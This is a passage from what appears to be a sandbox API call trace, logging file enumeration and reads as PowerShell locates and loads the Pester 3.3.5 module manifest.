ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.475] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0140.476] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0140.476] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0140.476] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0140.476] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0140.476] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0140.477] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0140.477] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0140.477] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0140.477] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0140.477] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0140.478] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0140.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dbb0) returned 1 [0140.478] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0xb156f8dc90 | out: lpFileInformation=0xb156f8dc90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db70) returned 1 [0140.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dc00) returned 1 [0140.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0140.479] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8d910 | out: lpFindFileData=0xb156f8d910*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.479] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.479] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0140.479] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0140.480] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0140.480] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.480] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0140.480] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0140.480] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0140.481] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0140.481] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0140.481] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0140.481] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0140.481] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0140.482] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0140.482] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0140.482] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.482] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db30) returned 1 [0140.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8daf0) returned 1 [0140.482] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0140.483] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0140.483] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0140.483] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0140.483] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0140.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0140.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.483] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0140.484] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.484] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.484] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0140.484] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.485] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0140.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ddb0) returned 1 [0140.485] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de90 | out: lpFileInformation=0xb156f8de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0140.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd70) returned 1 [0140.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0140.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8db50) returned 1 [0140.486] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6fc [0140.486] GetFileType (hFile=0x6fc) returned 0x1 [0140.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dac0) returned 1 [0140.486] GetFileType (hFile=0x6fc) returned 0x1 [0140.486] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392cd718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392cd718*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.487] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392cd718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392cd718*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.487] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392cd718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392cd718*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.488] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392cd718, 